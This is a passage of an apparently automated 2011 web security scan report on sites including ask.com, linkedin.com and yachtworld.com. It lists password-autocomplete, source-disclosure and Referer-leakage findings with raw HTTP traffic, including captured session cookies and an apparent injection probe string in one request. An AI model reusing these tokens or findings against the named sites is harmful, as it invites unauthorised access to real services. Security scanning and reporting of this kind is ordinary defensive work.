Host:	http://www.ask.com
Path:	/settings

Issue detail

The page contains a form with the following action URL:

http://www.ask.com/settings

The form contains the following password fields with autocomplete enabled:

currentpassword
newpassword
password

Request

Response

10.14. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page contains a form with the following action URL:

http://www.dynamicdrive.com/forums/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

Response

10.15. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The page contains a form with the following action URL:

https://www.linkedin.com/secure/login

The form contains the following password field with autocomplete enabled:

session_password

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296157780:09b133123a2fbbc6043a62ea9705fc511cdd3aa9"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:19:39 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:49:39 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:19:49 GMT;path=/;httponly
Content-Length: 12214

<!DOCTYPE html>
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="description" content="L
...[SNIP]...
</script>

<form action="/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:2350077440714366421">
...[SNIP]...
<div class="fieldgroup">

<input type="password" name="session_password" value="" id="session_password-login" tabindex="2">
<a href="http://www.linkedin.com/passwordReset?trk=signin_fpwd" class="nav-link">
...[SNIP]...

10.16. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The page contains a form with the following action URL:

http://www.reel-time.com/forum/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.17. http://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

The form contains the following password field with autocomplete enabled:

MyLoan.Password

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C05D03316DAB70E7658F65FBB7FC56F.boapp00; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Set-Cookie: boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
Set-Cookie: boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>

boat loans, yacht financing and refinancing - yachtworld.com
...[SNIP]...
<td valign="top">
<form action="https://www.yachtworld.com/boat-loans/consumer_loan_processing.html" method="post">
<table summary="boat finance" width="130" cellspacing="0" cellpadding="0" border="0">
...[SNIP]...
<td colspan="2"><input type=password size=15 name="MyLoan.Password"></td>
...[SNIP]...

10.18. https://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

The form contains the following password field with autocomplete enabled:

MyLoan.Password

Request

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; Path=/boat-loans; Secure
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Set-Cookie: boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
Set-Cookie: boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Keep-Alive: timeout=40, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>

boat loans, yacht financing and refinancing - yachtworld.com
...[SNIP]...
<td valign="top">
<form action="https://www.yachtworld.com/boat-loans/consumer_loan_processing.html" method="post">
<table summary="boat finance" width="130" cellspacing="0" cellpadding="0" border="0">
...[SNIP]...
<td colspan="2"><input type=password size=15 name="MyLoan.Password"></td>
...[SNIP]...

10.19. https://www.yachtworld.com/boat-loans/myLoan.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/myLoan.jsp

Issue detail

The page contains a form with the following action URL:

https://www.yachtworld.com/boat-loans/myLoan.jsp

The form contains the following password field with autocomplete enabled:

KField.MyLoan.Password

Request

Response

11. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. Cross-domain Referer leakage previous next
There are 58 instances of this issue:

http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://jqueryui.com/themeroller/
http://www.ask.com/
http://www.ask.com/
http://www.ask.com/
http://www.ask.com/
http://www.ask.com/ans
http://www.ask.com/answers
http://www.ask.com/answers/000/Notification
http://www.ask.com/homepage
http://www.ask.com/homepage
http://www.ask.com/iPhone
http://www.ask.com/ja-ask-dialog
http://www.ask.com/jsignin
http://www.ask.com/pictures
http://www.ask.com/pictureslanding
http://www.ask.com/pictureslanding
http://www.ask.com/settings
http://www.ask.com/skins
http://www.ask.com/videos
http://www.ask.com/videos
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/web
http://www.ask.com/webadvanced
http://www.boats.com/boat-transport/index.jsp
http://www.dynamicdrive.com/forums/showthread.php
https://www.linkedin.com/secure/login
http://www.reel-time.com/forum/showthread.php
http://www.yachtworld.com/core/globalnav/emailForm.jsp
http://www.yachtworld.com/core/help/searchHelp.jsp
http://www.yachtworld.com/core/listing/advancedSearch.jsp
http://www.yachtworld.com/core/listing/boatMergedDetails.jsp
http://www.yachtworld.com/core/listing/cache/searchResults.jsp
http://www.yachtworld.com/core/listing/displayPhoto.jsp
http://www.yachtworld.com/core/listing/photoGallery.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp
http://www.yachtworld.com/core/rendering/email-boat.htm
http://www.yachtworld.com/core/sponsored-boats/search.htm
http://www.yachtworld.com/leaving_yw.cgi
http://wzus1.ask.com/r
http://wzus1.ask.com/r
http://wzus1.ask.com/r
http://wzus1.ask.com/r

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

12.1. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh

The response contains the following links to other domains:

http://answers.ask.com/
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://www.ask.com/?o=0&l=dir&qsrc=2990
http://www.ask.com/about
http://www.ask.com/about/community
http://www.ask.com/about/company
http://www.ask.com/about/help
http://www.ask.com/about/legal
http://www.ask.com/about/legal/privacy
http://www.ask.com/about/perks
http://www.ask.com/advertise
http://www.ask.com/ans?qsrc=&o=0&l=dir&q=
http://www.ask.com/careers
http://www.ask.com/iPhone
http://www.ask.com/local?qsrc=&o=0&l=dir&what=
http://www.ask.com/maps?qsrc=&o=0&l=dir&fa=
http://www.ask.com/more
http://www.ask.com/news?qsrc=&o=0&l=dir&q=
http://www.ask.com/pictures?qsrc=&o=0&l=dir&q=&v=14
http://www.ask.com/recipes?qsrc=&o=0&l=dir&q=&vps=VT:RECP
http://www.ask.com/settings
http://www.ask.com/videos?qsrc=&o=0&l=dir&q=
http://www.ask.com/web?qsrc=&o=0&l=dir&q=
http://www.linkedin.com/companyInsider?script&useBorder=no

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=hohum555xhe001j4fainx255; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=04748c45-cae2-4fea-a87a-0039dff74982; expires=Sat, 26-Feb-2011 19:13:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 27 Jan 2011 19:13:08 GMT
Connection: close
Content-Length: 46678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="http://hire.jo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">

<a href="http://www.ask.com/web?qsrc=&o=0&l=dir&q=" class="txt3 b" id="nbl_webNavLink">Web</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">

<a href="http://www.ask.com/pictures?qsrc=&o=0&l=dir&q=&v=14" class="txt3 b" id="nbl_imagesNavLink">Images</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">

<a href="http://www.ask.com/news?qsrc=&o=0&l=dir&q=" class="txt3 b" id="nbl_newsNavLink">News</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">

<a href="http://www.ask.com/videos?qsrc=&o=0&l=dir&q=" class="txt3 b" id="nbl_videosNavLink">Videos</a>
...[SNIP]...
<div class="linkTitle b txt3 unselected" style="padding-top: 2px; padding-left: 5px; padding-right: 5px;">
<a id="collapsibleLink-more_control" href="http://www.ask.com/more" class="collapsibleLink txt3 b">More<span class="moreDropDown">
...[SNIP]...
<li>
<a href="http://www.ask.com/maps?qsrc=&o=0&l=dir&fa=" class="txt3 b" style="">Maps</a>
...[SNIP]...
<li>
<a href="http://www.ask.com/local?qsrc=&o=0&l=dir&what=" class="txt3 b" style="">Local</a>
...[SNIP]...
<td>
<a href="http://www.ask.com/ans?qsrc=&o=0&l=dir&q=" class="txt3 b" style="">Q&A</a>
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=" class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.ask.com/recipes?qsrc=&o=0&l=dir&q=&vps=VT:RECP" class="txt3 b" style="">Recipes</a>
...[SNIP]...
<div id="top_navbar_logo" class="searchBoxSprite">

<a href="http://www.ask.com/?o=0&l=dir&qsrc=2990" title="Ask.com" onMouseDown="return ct(this,30733)"></a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/community">Community</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/company">Company Info</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/perks">Perks</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/company">For Partners</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/help">Help Center</a>
...[SNIP]...
<li class="navMenuItem">
<a class="" href="http://www.ask.com/about/legal">Legal</a>
...[SNIP]...

<a href="http://www.ask.com/about" onMouseDown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
About</a>
...[SNIP]...

<a href="http://www.ask.com/about/legal/privacy" onMouseDown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
Privacy</a>
...[SNIP]...
</span>

<a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a>
...[SNIP]...

<a href="http://www.ask.com/advertise" onMouseDown="return ct(this,30738)" class="txt2 info l_nu" target="_top">
Advertise</a>
...[SNIP]...

<a href="http://www.ask.com/careers" onMouseDown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://answers.ask.com/" onMouseDown="return ct(this,52450)" class="txt2 info l_nu" target="_top">
Ask Answers</a>
...[SNIP]...

<a href="http://www.ask.com/iPhone" onMouseDown="return ct(this,54499)" class="txt2 info l_nu" target="_top">
iPhone</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onMouseDown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

12.2. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The page was loaded from a URL containing a query string:

http://jqueryui.com/themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css
http://docs.jquery.com/Donate
http://jquery.com/
http://jquery.org/
http://plugins.jquery.com/
http://static.jquery.com/ui/css/base2.css
http://static.jquery.com/ui/themeroller/app_css/app_screen.css
http://static.jquery.com/ui/themeroller/scripts/app.js
http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120172

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%
...[SNIP]...
55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">© 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

12.3. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/?o=0&l=dir

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155583709?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-792683817?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:03 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: tbe=1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:03 GMT; Path=/
Set-Cookie: accepting=1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:03 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjAzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:03 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:03 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 81417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155583709?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-792683817?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.4. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/?o=0&l=dir

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155563348?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-1329046005?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:12:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:12:43 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: tbe=1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
Set-Cookie: accepting=1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 81419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155563348?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
